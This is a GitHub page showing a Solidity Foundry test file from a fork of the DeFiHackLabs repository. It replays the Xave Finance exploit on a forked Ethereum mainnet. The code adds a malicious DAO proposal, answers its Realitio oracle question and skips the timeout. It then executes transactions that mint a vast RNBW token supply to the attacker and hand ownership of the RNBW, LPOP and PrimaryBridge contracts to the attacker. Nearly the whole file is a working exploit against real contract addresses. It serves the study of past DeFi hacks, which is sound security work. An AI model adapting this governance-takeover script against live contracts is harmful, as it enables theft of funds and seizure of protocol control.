forked from zhouxianyuan/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 2
/
XaveFinance_exp.sol
186 lines (154 loc) · 7.36 KB
/
XaveFinance_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
contract Enum {
enum Operation {
Call, DelegateCall
}
}
interface IDaoModule {
function getTransactionHash(address to, uint256 value, bytes memory data, Enum.Operation operation, uint256 nonce) external view returns(bytes32);
function executeProposalWithIndex(string memory proposalId, bytes32[] memory txHashes, address to, uint256 value, bytes memory data, Enum.Operation operation, uint256 txIndex) external;
function addProposal(string memory proposalId, bytes32[] memory txHashes) external;
function buildQuestion(string memory proposalId, bytes32[] memory txHashes) external pure returns(string memory);
function questionIds (bytes32) external returns (bytes32);
}
interface IRealitio {
function submitAnswer(bytes32 question_id, bytes32 answer, uint256 max_previous) external payable;
function isFinalized(bytes32 question_id) view external returns (bool);
}
interface IPrimaryBridge{
function owner() external view returns (address);
}
contract XaveFinanceExploit is DSTest {
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IERC20 RNBW = IERC20(0xE94B97b6b43639E238c851A7e693F50033EfD75C);
IERC20 LPOP = IERC20(0x6335A2E4a2E304401fcA4Fc0deafF066B813D055);
IPrimaryBridge PrimaryBridge = IPrimaryBridge(0x579270F151D142eb8BdC081043a983307Aa15786);
IDaoModule daoModule = IDaoModule(0x8f9036732b9aa9b82D8F35e54B71faeb2f573E2F);
IRealitio realitio = IRealitio (0x325a2e0F3CCA2ddbaeBB4DfC38Df8D19ca165b47);
address attacker = 0x0f44f3489D17e42ab13A6beb76E57813081fc1E2;
address attackerContract = 0xE167cdAAc8718b90c03Cf2CB75DC976E24EE86D3;
function setUp() public {
cheats.createSelectFork("mainnet", 15704736); // fork mainnet at 15704736
}
function encodeWithSignature_mint(address to, uint amount)
internal
pure
returns (bytes memory)
{
return abi.encodeWithSignature("mint(address,uint256)", to, amount);
}
function encodeWithSignature_transferOwnership(address to)
internal
pure
returns (bytes memory)
{
return abi.encodeWithSignature("transferOwnership(address)", to);
}
function testAttack() public {
//tx to mint 100000000000000 $RNBW tokens
bytes32 tx0 = daoModule.getTransactionHash(
0xE94B97b6b43639E238c851A7e693F50033EfD75C,
0,
encodeWithSignature_mint(attacker, 100000000000000000000000000000000),
//hex"40c10f190000000000000000000000000f44f3489d17e42ab13a6beb76e57813081fc1e200000000000000000000000000000000000004ee2d6d415b85acef8100000000",
Enum.Operation(0),
0
);
//tx to transferOwnership to attacker(0x0f44f3489D17e42ab13A6beb76E57813081fc1E2)
bytes32 tx1 = daoModule.getTransactionHash(
0xE94B97b6b43639E238c851A7e693F50033EfD75C,
0,
encodeWithSignature_transferOwnership(attacker),
//hex"f2fde38b0000000000000000000000000f44f3489d17e42ab13a6beb76e57813081fc1e2",
Enum.Operation(0),
1
);
//tx to transferOwnership to attacker(0x0f44f3489D17e42ab13A6beb76E57813081fc1E2)
bytes32 tx2 = daoModule.getTransactionHash(
0x6335A2E4a2E304401fcA4Fc0deafF066B813D055,
0,
encodeWithSignature_transferOwnership(attacker),
//hex"f2fde38b0000000000000000000000000f44f3489d17e42ab13a6beb76e57813081fc1e2",
Enum.Operation(0),
2
);
//tx to transferOwnership to attacker(0x0f44f3489D17e42ab13A6beb76E57813081fc1E2)
bytes32 tx3 = daoModule.getTransactionHash(
0x579270F151D142eb8BdC081043a983307Aa15786,
0,
encodeWithSignature_transferOwnership(attacker),
//hex"f2fde38b0000000000000000000000000f44f3489d17e42ab13a6beb76e57813081fc1e2",
Enum.Operation(0),
3
);
//the txIDs generated using getTransactionHash
bytes32[] memory txIDs = new bytes32[](4);
txIDs[0] = tx0;
txIDs[1] = tx1;
txIDs[2] = tx2;
txIDs[3] = tx3;
daoModule.addProposal("2", txIDs);
string memory q = daoModule.buildQuestion("2", txIDs);
bytes32 qID = daoModule.questionIds(keccak256(bytes(q)));
realitio.submitAnswer{value: 1}(qID, bytes32(uint256(1)), 0);
cheats.warp(block.timestamp + 24 * 60 * 60);
emit log_named_address("[Before proposal Execution] Owner of $RNBW: ", RNBW.owner());
emit log_named_address("[Before proposal Execution] Owner of $LPOP: ", LPOP.owner());
emit log_named_address("[Before proposal Execution] Owner of PrimaryBridge: ", PrimaryBridge.owner());
emit log_named_uint("[Before proposal Execution] Attacker's $RNBW Token Balance: ", RNBW.balanceOf(attacker) / 1 ether);
cheats.startPrank(attackerContract);
//Execute mint 100000000000000 $RNBW tokens
daoModule.executeProposalWithIndex(
"2",
txIDs,
0xE94B97b6b43639E238c851A7e693F50033EfD75C,
0,
encodeWithSignature_mint(attacker, 100000000000000000000000000000000),
//hex"40c10f190000000000000000000000000f44f3489d17e42ab13a6beb76e57813081fc1e200000000000000000000000000000000000004ee2d6d415b85acef8100000000",
Enum.Operation(0),
0
);
//Execute transferOwnership to attacker(0x0f44f3489D17e42ab13A6beb76E57813081fc1E2)
daoModule.executeProposalWithIndex(
"2",
txIDs,
0xE94B97b6b43639E238c851A7e693F50033EfD75C,
0,
encodeWithSignature_transferOwnership(attacker),
//hex"f2fde38b0000000000000000000000000f44f3489d17e42ab13a6beb76e57813081fc1e2",
Enum.Operation(0),
1
);
//Execute transferOwnership to attacker(0x0f44f3489D17e42ab13A6beb76E57813081fc1E2)
daoModule.executeProposalWithIndex(
"2",
txIDs,
0x6335A2E4a2E304401fcA4Fc0deafF066B813D055,
0,
encodeWithSignature_transferOwnership(attacker),
//hex"f2fde38b0000000000000000000000000f44f3489d17e42ab13a6beb76e57813081fc1e2",
Enum.Operation(0),
2
);
//Execute transferOwnership to attacker(0x0f44f3489D17e42ab13A6beb76E57813081fc1E2)
daoModule.executeProposalWithIndex(
"2",
txIDs,
0x579270F151D142eb8BdC081043a983307Aa15786,
0,
encodeWithSignature_transferOwnership(attacker),
//hex"f2fde38b0000000000000000000000000f44f3489d17e42ab13a6beb76e57813081fc1e2",
Enum.Operation(0),
3
);
cheats.stopPrank();
emit log_string("--------------------------------------------------------------");
emit log_named_address("[After proposal Execution] Owner of $RNBW: ", RNBW.owner());
emit log_named_address("[After proposal Execution] Owner of $LPOP: ", LPOP.owner());
emit log_named_address("[After proposal Execution] Owner of PrimaryBridge: ", PrimaryBridge.owner());
emit log_named_uint("[After proposal Execution] Attacker's $RNBW Token Balance: ", RNBW.balanceOf(attacker) / 1 ether);
}
}